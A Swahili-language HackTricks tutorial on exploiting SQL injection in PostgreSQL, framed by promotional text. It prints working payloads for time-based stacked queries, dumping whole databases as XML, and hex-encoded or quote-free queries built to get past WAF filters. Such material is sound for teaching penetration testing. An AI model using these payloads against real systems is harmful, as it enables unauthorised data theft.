.. | ||
big-binary-files-upload-postgresql.md | ||
dblink-lo_import-data-exfiltration.md | ||
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md | ||
pl-pgsql-password-bruteforce.md | ||
rce-with-postgresql-extensions.md | ||
rce-with-postgresql-languages.md | ||
README.md |
Kuingiza kwa PostgreSQL
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ikiwa una nia ya kazi ya kuhack na kuhack mambo ambayo hayawezi kuhack - tunatafuta wafanyakazi! (uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha unahitajika).
{% embed url="https://www.stmcyber.com/careers" %}
Ukurasa huu unalenga kueleza mbinu tofauti ambazo zinaweza kukusaidia kuchexploit SQLinjection iliyopatikana kwenye database ya postgresql na kuzipatia mbinu unazoweza kupata kwenye https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
Mwingiliano wa Mtandao - Ukarabati wa Mamlaka, Skana ya Bandari, Ufunuo wa Majibu ya Changamoto ya NTLM & Uchukuzi
Moduli ya PostgreSQL dblink
inatoa uwezo wa kuunganisha kwenye mifano mingine ya PostgreSQL na kutekeleza uhusiano wa TCP. Vipengele hivi, vikiungwa mkono na utendaji wa COPY FROM
, huwezesha hatua kama vile ukarabati wa mamlaka, skanning ya bandari, na kukamata majibu ya changamoto ya NTLM. Kwa njia za kina za kutekeleza mashambulizi haya angalia jinsi ya kutekeleza mashambulizi haya.
Mfano wa Uchukuzi ukitumia dblink na vitu vikubwa
Unaweza kusoma mfano huu kuona mfano wa CTF wa jinsi ya kupakia data ndani ya vitu vikubwa na kisha kuchukua yaliyomo ya vitu vikubwa ndani ya jina la mtumiaji wa kazi dblink_connect
.
Mashambulizi ya PostgreSQL: Kusoma/kuandika, RCE, privesc
Angalia jinsi ya kuhatarisha mwenyeji na kuongeza mamlaka kutoka PostgreSQL katika:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
Kupitisha WAF
Vipengele vya String vya PostgreSQL
Kubadilisha strings inaweza kukusaidia kupitisha WAFs au vizuizi vingine.
Kwenye ukurasa huu unaweza kupata baadhi ya Vipengele vya Strings vinavyoweza kusaidia.
Mipangilio Iliyopangwa
Kumbuka kwamba postgresql inasaidia mipangilio iliyopangwa, lakini programu kadhaa zitatoa kosa ikiwa majibu 2 yatarudi wakati inatarajia 1 tu. Lakini, bado unaweza kutumia vibaya mipangilio iliyopangwa kupitia Uingizaji wa Wakati:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
Mbinu za XML
query_to_xml
Hii kazi itarudisha data yote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kumwaga data nyingi katika safu moja tu:
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
Hii function itadump database nzima kwa muundo wa XML katika safu 1 tu (kuwa makini ikiwa database ni kubwa sana kwani unaweza kuisababishia DoS au hata mteja wako mwenyewe):
SELECT database_to_xml(true,true,'');
Strings in Hex
Ikiwa unaweza kuendesha maswali ukiyapitisha ndani ya string (kwa mfano kutumia kazi ya query_to_xml
). Unaweza kutumia convert_from kupitisha string kama hex na kuepuka mifumo ya kuchuja njia hii:
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
Alama za kutumia
Ikiwa huwezi kutumia alama za nukta kwa payload yako unaweza kuzipuuza kwa kutumia CHR
kwa ajili ya misemo ya msingi (kuunganisha herufi kazi kwa ajili ya maswali ya msingi kama vile SELECT, INSERT, DELETE, n.k. Hufanyi kazi kwa taarifa zote za SQL):
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Au na $
. Hizi kuuliza hurejesha matokeo sawa:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
Ikiwa una nia ya kazi ya udukuzi na kudukua yasiyoweza kudukuliwa - tunakupa kazi! (ujuzi wa Kipolishi wa kuandika na kusema unahitajika).
{% embed url="https://www.stmcyber.com/careers" %}
Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.